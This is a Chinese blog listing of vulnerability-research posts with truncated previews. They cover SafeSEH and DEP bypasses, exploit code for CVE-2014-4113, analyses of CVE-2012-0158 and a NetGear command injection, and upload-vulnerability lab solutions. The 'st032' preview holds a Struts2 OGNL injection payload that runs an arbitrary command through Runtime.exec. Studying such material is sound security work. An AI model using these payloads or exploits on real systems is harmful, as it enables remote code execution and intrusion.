漏洞挖掘
寒江雪语
这个作者很懒,什么都没留下…
展开
-
利用Adobe Flash Player ActiveX 控件绕过SafeSEH
PS: 参考0day 安全软件漏洞技术305页构造一个有漏洞的ActiveX控件,代码如下:void CVulnerSEHCtrl::test(LPCTSTR str){ //AFX_MANAGE_STATE(AfxGetStaticModuleState()); // TODO: Add your dispatch handler code here printf("aaaa"原创 2014-12-24 23:49:14 · 1744 阅读 · 0 评论 -
4113_exp_code
//// Cve-2014-4113 'win32/win64 exp C code' reversed from 'exe exp'// 2014-11-10// Compiled pass on VS2010//#include #include #pragma comment(lib, "user32.lib")////////////////////////////转载 2015-05-29 23:50:10 · 857 阅读 · 0 评论 -
特殊字符串
var buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1原创 2016-01-01 20:42:47 · 5792 阅读 · 0 评论 -
DEP: Ret2Libc via VirtualProtect()
VirtualProtect() 绕过DEP文章参考 0day 安全:软件漏洞分析技术:学习了DEP 绕过技术中的 VirtualProtect()绕过DEP,不过书中的例子是以windows 2003 为例,通过学习,一步一步在xp上测试成功。BOOL VirtualProtect{ LPVOID lpAddress, // 需要修改属性的内存的起始地址原创 2016-01-05 23:32:16 · 1040 阅读 · 1 评论 -
CVE-2012-0158 MSCOMCTL控件漏洞分析
参考:http://bbs.pediy.com/showthread.php?t=149957(样本是此链接提供的样本)运行样本后,会弹出计算器因为此类型的exp的shellcode 在运行的时候都会释放文件,释放文件时需要调用kernel32.dll 中的GetFileSize函数来判断需要释放的文件,所以在windbg开始调试poc时,在GetFileSize函数下断点,bu ke原创 2015-12-24 00:49:37 · 3869 阅读 · 1 评论 -
st032
?method:%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%23parameters.command[0]).getInputStream()%2c%23b%3dnew java.io.InputStreamRead翻译 2016-04-27 01:52:49 · 1134 阅读 · 1 评论 -
NetGear多款路由器远程命令注入漏洞分析(更新补丁分析)
转自:http://bobao.360.cn/learning/detail/3287.html本不想写这个文章的,只是在评论作者的问题时,提示字数太多,我一再缩减字数,发现还是评论不了,没办法呢只能在此写下问题,评论个连接:本人在分析时,基本上也是按照原作者的文章来的,只是发下原作者写的有些问题,这里说明下:======================================转载 2016-12-22 22:15:42 · 2794 阅读 · 3 评论 -
python http OPTIONS请求
通过发送http OPTIONS请求,可以获取 http允许的方法(我这里主要测试网站是否开启webDav),测试如下:import urllib2import jsonimport httpliburl='192.168.149.131'def http_get(): conn = httplib.HTTPConnection(url) conn.request("原创 2017-03-30 00:02:48 · 7878 阅读 · 0 评论 -
[代码审计]php上传漏洞总结
背景: 这两天在网上瞎看,看到别人总结的一个上传漏洞靶场,觉得很不错,就是自己测试了下, 感觉对代码审计能力提高还是有帮助的,下面简单介绍靶场的解题思路(当然,每一题可能存在多种上传方式)。 靶场地址:https://github.com/c0ny1/upload-labs 一、环境搭建 建议使用靶场提供的测试环境。 二、解题思路 Pass-01: 检查代码:functio...原创 2018-06-05 21:54:05 · 2350 阅读 · 0 评论